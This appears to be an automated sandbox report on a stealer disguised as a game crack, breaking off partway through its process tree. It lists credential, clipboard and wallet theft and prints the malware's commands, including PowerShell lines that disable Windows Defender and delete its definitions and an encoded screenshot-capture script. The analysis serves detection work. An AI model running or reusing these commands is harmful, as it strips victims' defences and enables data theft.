a21839b1f4ec7d9fa765bedf282699bdd84ed354eebfc6317bd09674b01894fb

Resubmissions

06-12-2024 05:50

241206-gjl4rssra1 9

06-12-2024 05:30

06-12-2024 05:14

06-12-2024 05:10

06-12-2024 04:51

06-12-2024 04:32

06-12-2024 04:28

Analysis

max time kernel
79s
max time network
81s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
06-12-2024 04:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Cracka.rar
Size

18.1MB
MD5

681be9b88898fa0cdb6f9a8f41b248ec
SHA1

ce3153537fc5bbe19524d475922b1423fdacd109
SHA256

a21839b1f4ec7d9fa765bedf282699bdd84ed354eebfc6317bd09674b01894fb
SHA512

7c8f4fa515cd839b25694fb5f0593b2fbd905100626718b7a4e32958a9a85f6c48ebf7235108d65c57e379bfd5760b1ca976cf0048e079a366118166ec79574b
SSDEEP

393216:V6/rhud0xQt8EJzrF3+Evma7sJ170jVMTZE3fzYXwKpuGqQM0j:V6NudcQxxOEvq8VMcYgKpVL

Score

10^/10

collection credential_access defense_evasion discovery evasion execution spyware stealer

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
2616	MpCmdRun.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Nursultan crack.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
476	cmd.exe
3144	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
3920	Crack.exe
1800	Nursultan crack.exe
1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe

Loads dropped DLL 43 IoCs

pid	Process
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4968	powershell.exe
1264	powershell.exe
2088	powershell.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
43	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2496	tasklist.exe
992	tasklist.exe
4484	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\CBS\CBS.log	TiWorker.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4416	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
884	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3920	Crack.exe
3920	Crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
4968	powershell.exe
4968	powershell.exe
1204	WMIC.exe
1204	WMIC.exe
1204	WMIC.exe
1204	WMIC.exe
4968	powershell.exe
4968	powershell.exe
3144	powershell.exe
3144	powershell.exe
1908	powershell.exe
1908	powershell.exe
3144	powershell.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1908	powershell.exe
1264	powershell.exe
1264	powershell.exe
1264	powershell.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
2772	powershell.exe
2772	powershell.exe
2772	powershell.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1368	WMIC.exe
1368	WMIC.exe
1368	WMIC.exe
1368	WMIC.exe
412	WMIC.exe
412	WMIC.exe
412	WMIC.exe
412	WMIC.exe
3468	WMIC.exe
3468	WMIC.exe
3468	WMIC.exe
3468	WMIC.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
2088	powershell.exe
2088	powershell.exe
4416	WMIC.exe
4416	WMIC.exe
4416	WMIC.exe
4416	WMIC.exe
884	powershell.exe
884	powershell.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe
1800	Nursultan crack.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2612	7zFM.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeRestorePrivilege	2612	7zFM.exe
Token: 35	2612	7zFM.exe
Token: SeSecurityPrivilege	2612	7zFM.exe
Token: SeDebugPrivilege	1800	Nursultan crack.exe
Token: SeDebugPrivilege	4968	powershell.exe
Token: SeDebugPrivilege	2496	tasklist.exe
Token: SeDebugPrivilege	992	tasklist.exe
Token: SeDebugPrivilege	4484	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1204	WMIC.exe
Token: SeSecurityPrivilege	1204	WMIC.exe
Token: SeTakeOwnershipPrivilege	1204	WMIC.exe
Token: SeLoadDriverPrivilege	1204	WMIC.exe
Token: SeSystemProfilePrivilege	1204	WMIC.exe
Token: SeSystemtimePrivilege	1204	WMIC.exe
Token: SeProfSingleProcessPrivilege	1204	WMIC.exe
Token: SeIncBasePriorityPrivilege	1204	WMIC.exe
Token: SeCreatePagefilePrivilege	1204	WMIC.exe
Token: SeBackupPrivilege	1204	WMIC.exe
Token: SeRestorePrivilege	1204	WMIC.exe
Token: SeShutdownPrivilege	1204	WMIC.exe
Token: SeDebugPrivilege	1204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1204	WMIC.exe
Token: SeRemoteShutdownPrivilege	1204	WMIC.exe
Token: SeUndockPrivilege	1204	WMIC.exe
Token: SeManageVolumePrivilege	1204	WMIC.exe
Token: 33	1204	WMIC.exe
Token: 34	1204	WMIC.exe
Token: 35	1204	WMIC.exe
Token: 36	1204	WMIC.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	1908	powershell.exe
Token: SeIncreaseQuotaPrivilege	1204	WMIC.exe
Token: SeSecurityPrivilege	1204	WMIC.exe
Token: SeTakeOwnershipPrivilege	1204	WMIC.exe
Token: SeLoadDriverPrivilege	1204	WMIC.exe
Token: SeSystemProfilePrivilege	1204	WMIC.exe
Token: SeSystemtimePrivilege	1204	WMIC.exe
Token: SeProfSingleProcessPrivilege	1204	WMIC.exe
Token: SeIncBasePriorityPrivilege	1204	WMIC.exe
Token: SeCreatePagefilePrivilege	1204	WMIC.exe
Token: SeBackupPrivilege	1204	WMIC.exe
Token: SeRestorePrivilege	1204	WMIC.exe
Token: SeShutdownPrivilege	1204	WMIC.exe
Token: SeDebugPrivilege	1204	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1204	WMIC.exe
Token: SeRemoteShutdownPrivilege	1204	WMIC.exe
Token: SeUndockPrivilege	1204	WMIC.exe
Token: SeManageVolumePrivilege	1204	WMIC.exe
Token: 33	1204	WMIC.exe
Token: 34	1204	WMIC.exe
Token: 35	1204	WMIC.exe
Token: 36	1204	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4968	powershell.exe
Token: SeSecurityPrivilege	4968	powershell.exe
Token: SeTakeOwnershipPrivilege	4968	powershell.exe
Token: SeLoadDriverPrivilege	4968	powershell.exe
Token: SeSystemProfilePrivilege	4968	powershell.exe
Token: SeSystemtimePrivilege	4968	powershell.exe
Token: SeProfSingleProcessPrivilege	4968	powershell.exe
Token: SeIncBasePriorityPrivilege	4968	powershell.exe
Token: SeCreatePagefilePrivilege	4968	powershell.exe
Token: SeBackupPrivilege	4968	powershell.exe
Token: SeRestorePrivilege	4968	powershell.exe
Token: SeShutdownPrivilege	4968	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2612	7zFM.exe
2612	7zFM.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
3920	Crack.exe
1800	Nursultan crack.exe
1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
2616	MpCmdRun.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 1800	3920	Crack.exe	92
PID 3920 wrote to memory of 1800	3920	Crack.exe	92
PID 1800 wrote to memory of 1516	1800	Nursultan crack.exe	93
PID 1800 wrote to memory of 1516	1800	Nursultan crack.exe	93
PID 1516 wrote to memory of 2220	1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	94
PID 1516 wrote to memory of 2220	1516	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	94
PID 2220 wrote to memory of 1640	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	96
PID 2220 wrote to memory of 1640	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	96
PID 1640 wrote to memory of 4968	1640	cmd.exe	98
PID 1640 wrote to memory of 4968	1640	cmd.exe	98
PID 2220 wrote to memory of 716	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	99
PID 2220 wrote to memory of 716	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	99
PID 2220 wrote to memory of 4592	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	100
PID 2220 wrote to memory of 4592	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	100
PID 4592 wrote to memory of 992	4592	cmd.exe	104
PID 4592 wrote to memory of 992	4592	cmd.exe	104
PID 2220 wrote to memory of 476	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	105
PID 2220 wrote to memory of 476	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	105
PID 2220 wrote to memory of 5080	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	106
PID 2220 wrote to memory of 5080	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	106
PID 2220 wrote to memory of 1692	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	107
PID 2220 wrote to memory of 1692	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	107
PID 2220 wrote to memory of 4160	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	137
PID 2220 wrote to memory of 4160	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	137
PID 2220 wrote to memory of 1056	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	113
PID 2220 wrote to memory of 1056	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	113
PID 1692 wrote to memory of 4484	1692	cmd.exe	115
PID 1692 wrote to memory of 4484	1692	cmd.exe	115
PID 2220 wrote to memory of 4544	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	116
PID 2220 wrote to memory of 4544	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	116
PID 5080 wrote to memory of 1204	5080	cmd.exe	141
PID 5080 wrote to memory of 1204	5080	cmd.exe	141
PID 4160 wrote to memory of 4652	4160	cmd.exe	118
PID 4160 wrote to memory of 4652	4160	cmd.exe	118
PID 476 wrote to memory of 3144	476	cmd.exe	120
PID 476 wrote to memory of 3144	476	cmd.exe	120
PID 4544 wrote to memory of 1908	4544	cmd.exe	121
PID 4544 wrote to memory of 1908	4544	cmd.exe	121
PID 1056 wrote to memory of 884	1056	cmd.exe	122
PID 1056 wrote to memory of 884	1056	cmd.exe	122
PID 2220 wrote to memory of 2916	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	123
PID 2220 wrote to memory of 2916	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	123
PID 2916 wrote to memory of 4976	2916	cmd.exe	125
PID 2916 wrote to memory of 4976	2916	cmd.exe	125
PID 2220 wrote to memory of 3476	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	126
PID 2220 wrote to memory of 3476	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	126
PID 3476 wrote to memory of 2060	3476	cmd.exe	129
PID 3476 wrote to memory of 2060	3476	cmd.exe	129
PID 2220 wrote to memory of 4432	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	130
PID 2220 wrote to memory of 4432	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	130
PID 1908 wrote to memory of 1952	1908	powershell.exe	132
PID 1908 wrote to memory of 1952	1908	powershell.exe	132
PID 4432 wrote to memory of 5064	4432	cmd.exe	133
PID 4432 wrote to memory of 5064	4432	cmd.exe	133
PID 2220 wrote to memory of 4360	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	134
PID 2220 wrote to memory of 4360	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	134
PID 4360 wrote to memory of 1552	4360	cmd.exe	136
PID 4360 wrote to memory of 1552	4360	cmd.exe	136
PID 1952 wrote to memory of 4160	1952	csc.exe	137
PID 1952 wrote to memory of 4160	1952	csc.exe	137
PID 2220 wrote to memory of 3708	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	138
PID 2220 wrote to memory of 3708	2220	0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe	138
PID 3708 wrote to memory of 4812	3708	cmd.exe	140
PID 3708 wrote to memory of 4812	3708	cmd.exe	140

C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\Cracka.rar"
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2612

C:\Users\Admin\Desktop\Crack.exe
"C:\Users\Admin\Desktop\Crack.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Users\Admin\AppData\Local\Temp\onefile_3920_133779329186348244\Nursultan crack.exe
  C:\Users\Admin\Desktop\Crack.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1800
- - C:\Users\Admin\AppData\Local\Temp\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1516_133779329264371345\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
      C:\Users\Admin\AppData\Local\Temp\0c38e779-9e43-4264-be46-6eeb9a538633.tmp.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2220
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1640
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4968
      - C:\Program Files\Windows Defender\MpCmdRun.exe
        
        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
        6⤵
        Deletes Windows Defender Definitions
        Suspicious use of SetWindowsHookEx
        
        PID:2616
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        
        PID:716
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4592
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:992
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        5⤵
        Clipboard Data
        Suspicious use of WriteProcessMemory
        
        PID:476
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        6⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3144
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5080
      - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1692
      - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        6⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4484
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4160
      - C:\Windows\system32\tree.com
        
        tree /A /F
        6⤵
        
        PID:4652
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1056
      - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        6⤵
        Gathers system information
        
        PID:884
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4544
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
